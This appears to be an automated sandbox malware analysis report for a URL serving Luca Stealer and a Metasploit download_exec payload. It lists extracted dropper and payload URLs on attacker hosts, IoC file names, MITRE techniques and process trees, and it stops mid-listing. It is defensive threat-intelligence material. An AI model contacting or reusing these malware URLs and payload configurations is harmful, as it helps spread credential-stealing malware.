lucastealer | hxxp://4[.]233[.]216[.]133

Analysis

max time kernel
688s
max time network
693s
platform
windows10-2004_x64
resource
win10v2004-20230703-en
resource tags

arch:x64arch:x86image:win10v2004-20230703-enlocale:en-usos:windows10-2004-x64system
submitted
01-08-2023 21:15

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

http://4.233.216.133

Score

10^/10

lucastealer metasploit backdoor stealer trojan

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://31.41.244.231/AVAVA/WAW/F0.oo

Extracted

Family

metasploit

Version

windows/download_exec

http://banqueislamik.ddrive.online:4448/x79t

Attributes

headers User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)

Signatures

Luca Stealer
Info stealer written in Rust first seen in July 2022.
stealer lucastealer

Luca Stealer payload 3 IoCs

Processes:

resource	yara_rule
C:\Users\Admin\Downloads\Unconfirmed 386463.crdownload	family_lucastealer
C:\Users\Admin\Downloads\cryptowalletinstaller.exe	family_lucastealer
C:\Users\Admin\Downloads\cryptowalletinstaller.exe	family_lucastealer

MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
trojan backdoor metasploit
Blocklisted process makes network request 1 IoCs

Processes:

powershell.exe

flow pid process

134 4784 powershell.exe
Downloads MZ/PE file

flow	pid	process
134	4784	powershell.exe

Executes dropped EXE 8 IoCs

Processes:

Ratelbgfhajhjcd9_browsingExe.exefile1.exefile2.exefile3.exefile4.execryptowalletinstaller.exeUnc4191bggjiiabbh4_browsingExe.exeCobaltbghdbghich1_browsing7Exe.exe

pid	process
564	Ratelbgfhajhjcd9_browsingExe.exe
4860	file1.exe
2132	file2.exe
4608	file3.exe
1660	file4.exe
4848	cryptowalletinstaller.exe
3784	Unc4191bggjiiabbh4_browsingExe.exe
436	Cobaltbghdbghich1_browsing7Exe.exe

Enumerates connected drives 3 TTPs 1 IoCs
Attempts to read the root path of hard drives other than the default C: drive.

Query Registry
T1012

Peripheral Device Discovery
T1120

System Information Discovery
T1082

Processes:

cryptowalletinstaller.exe

description ioc process

File opened (read-only) \??\F: cryptowalletinstaller.exe
Suspicious use of SetThreadContext 1 IoCs

Processes:

Cobaltbghdbghich1_browsing7Exe.exe

description pid process target process

PID 436 set thread context of 166644 436 Cobaltbghdbghich1_browsing7Exe.exe AppLaunch.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

description	ioc	process
File opened (read-only)	\??\F:	cryptowalletinstaller.exe

description	pid	process	target process
PID 436 set thread context of 166644	436	Cobaltbghdbghich1_browsing7Exe.exe	AppLaunch.exe

Modifies Internet Explorer settings 1 TTPs 1 IoCs

adware spyware

Modify Registry

T1112

Processes:

AcroRd32.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-3195054982-4292022746-1467505928-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION	AcroRd32.exe

Modifies data under HKEY_USERS 2 IoCs

Processes:

chrome.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133353981161233207"	chrome.exe

Modifies registry class 2 IoCs

Processes:

OpenWith.exechrome.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-3195054982-4292022746-1467505928-1000_Classes\Local Settings	OpenWith.exe
Key created	\REGISTRY\USER\S-1-5-21-3195054982-4292022746-1467505928-1000_Classes\Local Settings	chrome.exe

Suspicious behavior: AddClipboardFormatListener 2 IoCs

Processes:

WINWORD.EXE

pid process

1804 WINWORD.EXE
1804 WINWORD.EXE

pid	process
1804	WINWORD.EXE
1804	WINWORD.EXE

Suspicious behavior: EnumeratesProcesses 32 IoCs

Processes:

chrome.exechrome.execryptowalletinstaller.exepowershell.exeAcroRd32.exe

pid	process
4348	chrome.exe
4348	chrome.exe
3960	chrome.exe
3960	chrome.exe
4848	cryptowalletinstaller.exe
4848	cryptowalletinstaller.exe
4848	cryptowalletinstaller.exe
4848	cryptowalletinstaller.exe
4848	cryptowalletinstaller.exe
4848	cryptowalletinstaller.exe
4784	powershell.exe
4784	powershell.exe
3244	AcroRd32.exe
3244	AcroRd32.exe
3244	AcroRd32.exe
3244	AcroRd32.exe
3244	AcroRd32.exe
3244	AcroRd32.exe
3244	AcroRd32.exe
3244	AcroRd32.exe
3244	AcroRd32.exe
3244	AcroRd32.exe
3244	AcroRd32.exe
3244	AcroRd32.exe
3244	AcroRd32.exe
3244	AcroRd32.exe
3244	AcroRd32.exe
3244	AcroRd32.exe
3244	AcroRd32.exe
3244	AcroRd32.exe
3244	AcroRd32.exe
3244	AcroRd32.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

OpenWith.exe

pid process

1448 OpenWith.exe
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 2 IoCs

Processes:

chrome.exe

pid process

4348 chrome.exe
4348 chrome.exe

pid	process
1448	OpenWith.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

chrome.exe

description	pid	process
Token: SeShutdownPrivilege	4348	chrome.exe
Token: SeCreatePagefilePrivilege	4348	chrome.exe
Token: SeShutdownPrivilege	4348	chrome.exe
Token: SeCreatePagefilePrivilege	4348	chrome.exe
Token: SeShutdownPrivilege	4348	chrome.exe
Token: SeCreatePagefilePrivilege	4348	chrome.exe
Token: SeShutdownPrivilege	4348	chrome.exe
Token: SeCreatePagefilePrivilege	4348	chrome.exe
Token: SeShutdownPrivilege	4348	chrome.exe
Token: SeCreatePagefilePrivilege	4348	chrome.exe
Token: SeShutdownPrivilege	4348	chrome.exe
Token: SeCreatePagefilePrivilege	4348	chrome.exe
Token: SeShutdownPrivilege	4348	chrome.exe
Token: SeCreatePagefilePrivilege	4348	chrome.exe
Token: SeShutdownPrivilege	4348	chrome.exe
Token: SeCreatePagefilePrivilege	4348	chrome.exe
Token: SeShutdownPrivilege	4348	chrome.exe
Token: SeCreatePagefilePrivilege	4348	chrome.exe
Token: SeShutdownPrivilege	4348	chrome.exe
Token: SeCreatePagefilePrivilege	4348	chrome.exe
Token: SeShutdownPrivilege	4348	chrome.exe
Token: SeCreatePagefilePrivilege	4348	chrome.exe
Token: SeShutdownPrivilege	4348	chrome.exe
Token: SeCreatePagefilePrivilege	4348	chrome.exe
Token: SeShutdownPrivilege	4348	chrome.exe
Token: SeCreatePagefilePrivilege	4348	chrome.exe
Token: SeShutdownPrivilege	4348	chrome.exe
Token: SeCreatePagefilePrivilege	4348	chrome.exe
Token: SeShutdownPrivilege	4348	chrome.exe
Token: SeCreatePagefilePrivilege	4348	chrome.exe
Token: SeShutdownPrivilege	4348	chrome.exe
Token: SeCreatePagefilePrivilege	4348	chrome.exe
Token: SeShutdownPrivilege	4348	chrome.exe
Token: SeCreatePagefilePrivilege	4348	chrome.exe
Token: SeShutdownPrivilege	4348	chrome.exe
Token: SeCreatePagefilePrivilege	4348	chrome.exe
Token: SeShutdownPrivilege	4348	chrome.exe
Token: SeCreatePagefilePrivilege	4348	chrome.exe
Token: SeShutdownPrivilege	4348	chrome.exe
Token: SeCreatePagefilePrivilege	4348	chrome.exe
Token: SeShutdownPrivilege	4348	chrome.exe
Token: SeCreatePagefilePrivilege	4348	chrome.exe
Token: SeShutdownPrivilege	4348	chrome.exe
Token: SeCreatePagefilePrivilege	4348	chrome.exe
Token: SeShutdownPrivilege	4348	chrome.exe
Token: SeCreatePagefilePrivilege	4348	chrome.exe
Token: SeShutdownPrivilege	4348	chrome.exe
Token: SeCreatePagefilePrivilege	4348	chrome.exe
Token: SeShutdownPrivilege	4348	chrome.exe
Token: SeCreatePagefilePrivilege	4348	chrome.exe
Token: SeShutdownPrivilege	4348	chrome.exe
Token: SeCreatePagefilePrivilege	4348	chrome.exe
Token: SeShutdownPrivilege	4348	chrome.exe
Token: SeCreatePagefilePrivilege	4348	chrome.exe
Token: SeShutdownPrivilege	4348	chrome.exe
Token: SeCreatePagefilePrivilege	4348	chrome.exe
Token: SeShutdownPrivilege	4348	chrome.exe
Token: SeCreatePagefilePrivilege	4348	chrome.exe
Token: SeShutdownPrivilege	4348	chrome.exe
Token: SeCreatePagefilePrivilege	4348	chrome.exe
Token: SeShutdownPrivilege	4348	chrome.exe
Token: SeCreatePagefilePrivilege	4348	chrome.exe
Token: SeShutdownPrivilege	4348	chrome.exe
Token: SeCreatePagefilePrivilege	4348	chrome.exe

Suspicious use of FindShellTrayWindow 64 IoCs

Processes:

chrome.exe

pid	process
4348	chrome.exe
4348	chrome.exe
4348	chrome.exe
4348	chrome.exe
4348	chrome.exe
4348	chrome.exe
4348	chrome.exe
4348	chrome.exe
4348	chrome.exe
4348	chrome.exe
4348	chrome.exe
4348	chrome.exe
4348	chrome.exe
4348	chrome.exe
4348	chrome.exe
4348	chrome.exe
4348	chrome.exe
4348	chrome.exe
4348	chrome.exe
4348	chrome.exe
4348	chrome.exe
4348	chrome.exe
4348	chrome.exe
4348	chrome.exe
4348	chrome.exe
4348	chrome.exe
4348	chrome.exe
4348	chrome.exe
4348	chrome.exe
4348	chrome.exe
4348	chrome.exe
4348	chrome.exe
4348	chrome.exe
4348	chrome.exe
4348	chrome.exe
4348	chrome.exe
4348	chrome.exe
4348	chrome.exe
4348	chrome.exe
4348	chrome.exe
4348	chrome.exe
4348	chrome.exe
4348	chrome.exe
4348	chrome.exe
4348	chrome.exe
4348	chrome.exe
4348	chrome.exe
4348	chrome.exe
4348	chrome.exe
4348	chrome.exe
4348	chrome.exe
4348	chrome.exe
4348	chrome.exe
4348	chrome.exe
4348	chrome.exe
4348	chrome.exe
4348	chrome.exe
4348	chrome.exe
4348	chrome.exe
4348	chrome.exe
4348	chrome.exe
4348	chrome.exe
4348	chrome.exe
4348	chrome.exe

Suspicious use of SendNotifyMessage 24 IoCs

Processes:

chrome.exe

pid	process
4348	chrome.exe
4348	chrome.exe
4348	chrome.exe
4348	chrome.exe
4348	chrome.exe
4348	chrome.exe
4348	chrome.exe
4348	chrome.exe
4348	chrome.exe
4348	chrome.exe
4348	chrome.exe
4348	chrome.exe
4348	chrome.exe
4348	chrome.exe
4348	chrome.exe
4348	chrome.exe
4348	chrome.exe
4348	chrome.exe
4348	chrome.exe
4348	chrome.exe
4348	chrome.exe
4348	chrome.exe
4348	chrome.exe
4348	chrome.exe

Suspicious use of SetWindowsHookEx 38 IoCs

Processes:

chrome.exeOpenWith.exeAcroRd32.exeWINWORD.EXE

pid	process
4348	chrome.exe
1448	OpenWith.exe
1448	OpenWith.exe
1448	OpenWith.exe
1448	OpenWith.exe
1448	OpenWith.exe
1448	OpenWith.exe
1448	OpenWith.exe
1448	OpenWith.exe
1448	OpenWith.exe
1448	OpenWith.exe
1448	OpenWith.exe
1448	OpenWith.exe
1448	OpenWith.exe
1448	OpenWith.exe
1448	OpenWith.exe
1448	OpenWith.exe
1448	OpenWith.exe
1448	OpenWith.exe
1448	OpenWith.exe
1448	OpenWith.exe
1448	OpenWith.exe
3244	AcroRd32.exe
3244	AcroRd32.exe
3244	AcroRd32.exe
3244	AcroRd32.exe
3244	AcroRd32.exe
3244	AcroRd32.exe
1804	WINWORD.EXE
1804	WINWORD.EXE
1804	WINWORD.EXE
1804	WINWORD.EXE
1804	WINWORD.EXE
1804	WINWORD.EXE
1804	WINWORD.EXE
1804	WINWORD.EXE
1804	WINWORD.EXE
1804	WINWORD.EXE

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

chrome.exe

description	pid	process	target process
PID 4348 wrote to memory of 4004	4348	chrome.exe	chrome.exe
PID 4348 wrote to memory of 4004	4348	chrome.exe	chrome.exe
PID 4348 wrote to memory of 2376	4348	chrome.exe	chrome.exe
PID 4348 wrote to memory of 2376	4348	chrome.exe	chrome.exe
PID 4348 wrote to memory of 2376	4348	chrome.exe	chrome.exe
PID 4348 wrote to memory of 2376	4348	chrome.exe	chrome.exe
PID 4348 wrote to memory of 2376	4348	chrome.exe	chrome.exe
PID 4348 wrote to memory of 2376	4348	chrome.exe	chrome.exe
PID 4348 wrote to memory of 2376	4348	chrome.exe	chrome.exe
PID 4348 wrote to memory of 2376	4348	chrome.exe	chrome.exe
PID 4348 wrote to memory of 2376	4348	chrome.exe	chrome.exe
PID 4348 wrote to memory of 2376	4348	chrome.exe	chrome.exe
PID 4348 wrote to memory of 2376	4348	chrome.exe	chrome.exe
PID 4348 wrote to memory of 2376	4348	chrome.exe	chrome.exe
PID 4348 wrote to memory of 2376	4348	chrome.exe	chrome.exe
PID 4348 wrote to memory of 2376	4348	chrome.exe	chrome.exe
PID 4348 wrote to memory of 2376	4348	chrome.exe	chrome.exe
PID 4348 wrote to memory of 2376	4348	chrome.exe	chrome.exe
PID 4348 wrote to memory of 2376	4348	chrome.exe	chrome.exe
PID 4348 wrote to memory of 2376	4348	chrome.exe	chrome.exe
PID 4348 wrote to memory of 2376	4348	chrome.exe	chrome.exe
PID 4348 wrote to memory of 2376	4348	chrome.exe	chrome.exe
PID 4348 wrote to memory of 2376	4348	chrome.exe	chrome.exe
PID 4348 wrote to memory of 2376	4348	chrome.exe	chrome.exe
PID 4348 wrote to memory of 2376	4348	chrome.exe	chrome.exe
PID 4348 wrote to memory of 2376	4348	chrome.exe	chrome.exe
PID 4348 wrote to memory of 2376	4348	chrome.exe	chrome.exe
PID 4348 wrote to memory of 2376	4348	chrome.exe	chrome.exe
PID 4348 wrote to memory of 2376	4348	chrome.exe	chrome.exe
PID 4348 wrote to memory of 2376	4348	chrome.exe	chrome.exe
PID 4348 wrote to memory of 2376	4348	chrome.exe	chrome.exe
PID 4348 wrote to memory of 2376	4348	chrome.exe	chrome.exe
PID 4348 wrote to memory of 2376	4348	chrome.exe	chrome.exe
PID 4348 wrote to memory of 2376	4348	chrome.exe	chrome.exe
PID 4348 wrote to memory of 2376	4348	chrome.exe	chrome.exe
PID 4348 wrote to memory of 2376	4348	chrome.exe	chrome.exe
PID 4348 wrote to memory of 2376	4348	chrome.exe	chrome.exe
PID 4348 wrote to memory of 2376	4348	chrome.exe	chrome.exe
PID 4348 wrote to memory of 2376	4348	chrome.exe	chrome.exe
PID 4348 wrote to memory of 2376	4348	chrome.exe	chrome.exe
PID 4348 wrote to memory of 1828	4348	chrome.exe	chrome.exe
PID 4348 wrote to memory of 1828	4348	chrome.exe	chrome.exe
PID 4348 wrote to memory of 2060	4348	chrome.exe	chrome.exe
PID 4348 wrote to memory of 2060	4348	chrome.exe	chrome.exe
PID 4348 wrote to memory of 2060	4348	chrome.exe	chrome.exe
PID 4348 wrote to memory of 2060	4348	chrome.exe	chrome.exe
PID 4348 wrote to memory of 2060	4348	chrome.exe	chrome.exe
PID 4348 wrote to memory of 2060	4348	chrome.exe	chrome.exe
PID 4348 wrote to memory of 2060	4348	chrome.exe	chrome.exe
PID 4348 wrote to memory of 2060	4348	chrome.exe	chrome.exe
PID 4348 wrote to memory of 2060	4348	chrome.exe	chrome.exe
PID 4348 wrote to memory of 2060	4348	chrome.exe	chrome.exe
PID 4348 wrote to memory of 2060	4348	chrome.exe	chrome.exe
PID 4348 wrote to memory of 2060	4348	chrome.exe	chrome.exe
PID 4348 wrote to memory of 2060	4348	chrome.exe	chrome.exe
PID 4348 wrote to memory of 2060	4348	chrome.exe	chrome.exe
PID 4348 wrote to memory of 2060	4348	chrome.exe	chrome.exe
PID 4348 wrote to memory of 2060	4348	chrome.exe	chrome.exe
PID 4348 wrote to memory of 2060	4348	chrome.exe	chrome.exe
PID 4348 wrote to memory of 2060	4348	chrome.exe	chrome.exe
PID 4348 wrote to memory of 2060	4348	chrome.exe	chrome.exe
PID 4348 wrote to memory of 2060	4348	chrome.exe	chrome.exe
PID 4348 wrote to memory of 2060	4348	chrome.exe	chrome.exe
PID 4348 wrote to memory of 2060	4348	chrome.exe	chrome.exe

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-background-networking --disable-component-update --simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT' --single-argument http://4.233.216.133
1⤵
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4348
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffbfb409758,0x7ffbfb409768,0x7ffbfb409778
  2⤵
  PID:4004
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1772 --field-trial-handle=1868,i,16912332186550931220,398048768253209879,131072 /prefetch:2
  2⤵
  PID:2376
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2152 --field-trial-handle=1868,i,16912332186550931220,398048768253209879,131072 /prefetch:8
  2⤵
  PID:1828
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2236 --field-trial-handle=1868,i,16912332186550931220,398048768253209879,131072 /prefetch:8
  2⤵
  PID:2060
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2828 --field-trial-handle=1868,i,16912332186550931220,398048768253209879,131072 /prefetch:1
  2⤵
  PID:2940
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2812 --field-trial-handle=1868,i,16912332186550931220,398048768253209879,131072 /prefetch:1
  2⤵
  PID:2764
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4656 --field-trial-handle=1868,i,16912332186550931220,398048768253209879,131072 /prefetch:8
  2⤵
  PID:1868
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4836 --field-trial-handle=1868,i,16912332186550931220,398048768253209879,131072 /prefetch:8
  2⤵
  PID:3636
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1600 --field-trial-handle=1868,i,16912332186550931220,398048768253209879,131072 /prefetch:2
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:3960
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5040 --field-trial-handle=1868,i,16912332186550931220,398048768253209879,131072 /prefetch:8
  2⤵
  PID:4320
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=4780 --field-trial-handle=1868,i,16912332186550931220,398048768253209879,131072 /prefetch:8
  2⤵
  PID:4104
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=4976 --field-trial-handle=1868,i,16912332186550931220,398048768253209879,131072 /prefetch:8
  2⤵
  PID:1692
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1752 --field-trial-handle=1868,i,16912332186550931220,398048768253209879,131072 /prefetch:8
  2⤵
  PID:1660
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=2784 --field-trial-handle=1868,i,16912332186550931220,398048768253209879,131072 /prefetch:8
  2⤵
  PID:4644
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5384 --field-trial-handle=1868,i,16912332186550931220,398048768253209879,131072 /prefetch:8
  2⤵
  PID:4476
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5304 --field-trial-handle=1868,i,16912332186550931220,398048768253209879,131072 /prefetch:8
  2⤵
  PID:2724
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5560 --field-trial-handle=1868,i,16912332186550931220,398048768253209879,131072 /prefetch:8
  2⤵
  PID:3724
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5892 --field-trial-handle=1868,i,16912332186550931220,398048768253209879,131072 /prefetch:8
  2⤵
  PID:2972
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5284 --field-trial-handle=1868,i,16912332186550931220,398048768253209879,131072 /prefetch:8
  2⤵
  PID:4040
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5824 --field-trial-handle=1868,i,16912332186550931220,398048768253209879,131072 /prefetch:8
  2⤵
  PID:4120
- C:\Users\Admin\Downloads\Ratelbgfhajhjcd9_browsingExe.exe
  "C:\Users\Admin\Downloads\Ratelbgfhajhjcd9_browsingExe.exe"
  2⤵
  - Executes dropped EXE
  PID:564
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5060 --field-trial-handle=1868,i,16912332186550931220,398048768253209879,131072 /prefetch:8
  2⤵
  PID:1812
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6136 --field-trial-handle=1868,i,16912332186550931220,398048768253209879,131072 /prefetch:8
  2⤵
  PID:4596
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5284 --field-trial-handle=1868,i,16912332186550931220,398048768253209879,131072 /prefetch:8
  2⤵
  PID:4468
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6140 --field-trial-handle=1868,i,16912332186550931220,398048768253209879,131072 /prefetch:8
  2⤵
  PID:3636
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5292 --field-trial-handle=1868,i,16912332186550931220,398048768253209879,131072 /prefetch:8
  2⤵
  PID:4696
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5876 --field-trial-handle=1868,i,16912332186550931220,398048768253209879,131072 /prefetch:8
  2⤵
  PID:3500
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6100 --field-trial-handle=1868,i,16912332186550931220,398048768253209879,131072 /prefetch:8
  2⤵
  PID:2056
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5920 --field-trial-handle=1868,i,16912332186550931220,398048768253209879,131072 /prefetch:8
  2⤵
  PID:4120
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6012 --field-trial-handle=1868,i,16912332186550931220,398048768253209879,131072 /prefetch:8
  2⤵
  PID:3676
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5940 --field-trial-handle=1868,i,16912332186550931220,398048768253209879,131072 /prefetch:8
  2⤵
  PID:3800
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5512 --field-trial-handle=1868,i,16912332186550931220,398048768253209879,131072 /prefetch:8
  2⤵
  PID:1576
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6000 --field-trial-handle=1868,i,16912332186550931220,398048768253209879,131072 /prefetch:8
  2⤵
  PID:4852
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6136 --field-trial-handle=1868,i,16912332186550931220,398048768253209879,131072 /prefetch:8
  2⤵
  PID:2644
- C:\Program Files\Google\Chrome\Application\chrome.exe
